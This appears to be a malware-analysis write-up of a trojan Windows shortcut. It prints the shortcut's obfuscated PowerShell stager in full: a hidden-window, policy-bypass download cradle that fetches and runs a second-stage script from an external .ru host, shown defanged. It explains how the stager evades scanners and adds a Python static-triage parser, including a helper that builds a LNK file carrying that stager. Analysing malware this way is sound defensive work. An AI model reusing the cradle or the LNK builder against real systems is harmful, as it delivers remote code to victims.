Trojan malware – Microsoft Shortcut (LNK)


I downloaded this sample for malware analysis and changed its extension to .LNK, the Microsoft Shortcut format.

Right-clicking the file and opening Properties > Shortcut shows that the target is not a document or program but an embedded PowerShell command line.


Below is the PowerShell command line stored in the shortcut's target. It does not drop a file to disk: it downloads a second-stage PowerShell script from the URL and executes it in memory.

The URL is http[:]//timebounder[.]ru and the script fetched is pps[.]ps1 (defanged here so it is not clickable).

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 $je=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal calc $je;$mM=((New-Object Net.WebClient)).DownloadString('http[:]//timebounder[.]ru/pps.ps1');calc $mM

Step by step: -Exec bypass is the abbreviated -ExecutionPolicy Bypass, and -windo 1 is -WindowStyle Hidden, so no console window is shown to the victim. The Base64 string aWV4 decodes to iex, and sal calc $je (Set-Alias) makes the innocuous-looking name calc an alias for Invoke-Expression. Net.WebClient.DownloadString fetches pps.ps1 as a string, and calc $mM hands that string to Invoke-Expression, so the second stage runs without ever being written to disk. The Base64 and the alias exist only to keep the literal strings "iex" and "Invoke-Expression" out of the command line that static scanners and process-creation logs see.
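The same triage can be done without opening the shortcut in Explorer or running anything. The Python script below is an added example (not code from the original post): it parses the LNK layout defined in MS-SHLLINK (ShellLinkHeader, optional LinkTargetIDList and LinkInfo, then the StringData strings), pulls out the target and the command-line arguments, decodes the inline Base64, resolves the sal alias and lists the cradle indicators. Because the real sample is not reproduced on this page, the LNK bytes it analyses are constructed inline from the command line above, with the URL kept defanged; the IDList and LinkInfo contents of the real file are not represented, and the builder, its dummy IDList and the indicator labels are assumptions of this example.

```python
"""Static triage of a Windows Shortcut (.LNK) carrying a PowerShell download cradle.

Added example, not code from the original post. The layout follows MS-SHLLINK:
ShellLinkHeader (0x4C bytes), optional LinkTargetIDList, optional LinkInfo,
then StringData (NAME, RELATIVE_PATH, WORKING_DIR, ARGUMENTS, ICON_LOCATION).
Nothing here executes the shortcut or touches the network.
"""
import base64
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_DATA_ORDER = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)
# CLSID 00021401-0000-0000-C000-000000000046 in its on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# HeaderSize, CLSID, LinkFlags, FileAttributes, 3x FILETIME, FileSize, IconIndex,
# ShowCommand, HotKey, Reserved1/2/3: 76 bytes in total
HEADER_FMT = "<I16sIIQQQIIIH2sII"


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData strings of an LNK blob."""
    fields = struct.unpack_from(HEADER_FMT, data, 0)
    header_size, clsid, flags, show_cmd = fields[0], fields[1], fields[2], fields[9]
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link: bad HeaderSize or CLSID")
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize covers the whole struct
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags, "show_command": show_cmd}
    for flag, name in STRING_DATA_ORDER:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        out[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += width * count
    return out


# $var = ...FromBase64String('...') assignments, `sal alias $var`, and (defanged) URLs
B64_ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*[^;]*?FromBase64String\('([A-Za-z0-9+/=]+)'\)")
ALIAS_RE = re.compile(r"\bsal\s+(\S+)\s+\$(\w+)", re.IGNORECASE)
URL_RE = re.compile(r"https?\[?:\]?//[^\s'\"()]+")


def analyse_arguments(args: str) -> dict:
    """Decode Base64 literals, resolve `sal` aliases and flag cradle indicators."""
    decoded = {"$" + m.group(1): base64.b64decode(m.group(2)).decode("utf-8", "replace")
               for m in B64_ASSIGN_RE.finditer(args)}
    aliases = {m.group(1): decoded.get("$" + m.group(2), "$" + m.group(2))
               for m in ALIAS_RE.finditer(args)}
    low = args.lower()
    checks = (  # indicator labels are this example's own naming
        (r"-exec\w*\s+bypass", "execution policy bypass"),
        (r"-windo\w*\s+(1|hidden)", "hidden window"),
        (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", "download cradle"),
    )
    indicators = [label for pattern, label in checks if re.search(pattern, low)]
    if any(v.lower() in ("iex", "invoke-expression") for v in aliases.values()):
        indicators.append("Invoke-Expression hidden behind an alias")
    return {"decoded": decoded, "aliases": aliases, "urls": URL_RE.findall(args),
            "indicators": indicators}


# Constructed sample: the stager from the post, URL left defanged so it never resolves
SAMPLE_TARGET = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_WORKDIR = r"C:\Windows\System32\WindowsPowerShell\v1.0"
SAMPLE_ARGUMENTS = (
    "-Exec bypass -windo 1 "
    "$je=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));"
    "sal calc $je;"
    "$mM=((New-Object Net.WebClient)).DownloadString('http[:]//timebounder[.]ru/pps.ps1');"
    "calc $mM"
)


def build_sample_lnk(target: str, workdir: str, arguments: str, idlist: bytes = b"") -> bytes:
    """Construct a minimal Unicode LNK (optional dummy IDList, no LinkInfo) for testing."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    if idlist:
        flags |= HAS_LINK_TARGET_ID_LIST
    header = struct.pack(HEADER_FMT, 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0,
                         7, 0, b"\0\0", 0, 0)   # ShowCommand 7 = SW_SHOWMINNOACTIVE
    body = struct.pack("<H", len(idlist)) + idlist if idlist else b""
    body += b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                     for s in (target, workdir, arguments))
    return header + body


def triage(data: bytes) -> dict:
    """Parse the LNK and analyse its arguments; never executes anything."""
    info = parse_lnk(data)
    report = {"target": info.get("relative_path") or info.get("name", ""),
              "show_command": info["show_command"]}
    report.update(analyse_arguments(info.get("arguments", "")))
    return report


if __name__ == "__main__":
    sample = build_sample_lnk(SAMPLE_TARGET, SAMPLE_WORKDIR, SAMPLE_ARGUMENTS)
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

Running triage on a real .lnk is a matter of passing open(path, "rb").read() to triage(); a ShowCommand of 7 (SW_SHOWMINNOACTIVE) or a -WindowStyle Hidden argument on a shortcut whose target is powershell.exe is itself worth an alert, before any decoding.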


I tried running the script, but the website (http[:]//timebounder[.]ru) is down, so the second-stage PowerShell script pps.ps1 could not be retrieved and the analysis stops at the stager. Detonating a sample like this belongs in an isolated VM with network capture, since the stager would otherwise fetch and execute whatever the server returns.

VirusTotal – https://www.virustotal.com/#/file/4e69c30090d67980721c36c655116e7f77059672606dfd9dc28206c0472fee98/detection

SHA256 – 4e69c30090d67980721c36c655116e7f77059672606dfd9dc28206c0472fee98
